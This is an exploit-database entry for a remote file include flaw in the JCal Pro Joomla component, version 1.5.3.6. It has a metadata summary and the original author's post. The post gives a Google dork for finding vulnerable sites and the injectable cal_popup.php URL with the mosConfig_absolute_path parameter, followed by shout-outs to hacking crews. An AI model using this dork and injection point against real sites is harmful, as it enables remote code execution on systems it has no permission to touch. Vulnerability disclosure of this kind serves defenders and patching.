header-logo
Suggest Exploit
vendor:
JCal Pro Component
by:
kaMtiEz
9.3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: JCal Pro Component
Affected Version From: 1.5.3.6
Affected Version To: 1.5.3.6
Patch Exists: YES
Related CWE: N/A
CPE: a:anything-digital:jcal_pro_component
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

JCal Pro Component Remote File Include Vulnerability

A remote file include vulnerability exists in JCal Pro Component, which allows an attacker to include a remote file containing malicious code on the vulnerable system. This vulnerability is due to insufficient sanitization of user-supplied input in the 'mosConfig_absolute_path' parameter of the 'cal_popup.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. Successful exploitation could result in arbitrary remote code execution.

Mitigation:

Upgrade to the latest version of JCal Pro Component.
Source

Exploit-DB raw data:

#############################################################################################################
##
## Author : kaMtiEz kamzcrew@yahoo.com)								   ##
## ##Homepage:http://www.indonesiancoder.com    	     					    	    ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.anything-digital.com
[+] version : 1.5.3.6 Stable or upper / lower maybe also affected
[+] Dork : inurl:"com_jcalpro"
#############################################################################################################

[ Vulnerable File ]

http://server/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=[INDONESIANCODER]

[ BUG ]

cal_popup.php

[ FIX ]

tanya aurakasih mungkin dia tauh :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Babe enyak adek i love u pull dah .. 
[+] Setelah Bertapa kagak jelas ampe pagi sama Om Don Tukuesto ... dan lagi lagi akhirnya nemu lobang :D
[+] iseng2 berhadiah bugs .. omegod >.<
[+] capek juga dari surabaya .. fyuh .,. 
[ QUOTE ]

[+] one day .. u will be mind .. >.<
[+] AURAKASIH u are so  .. hha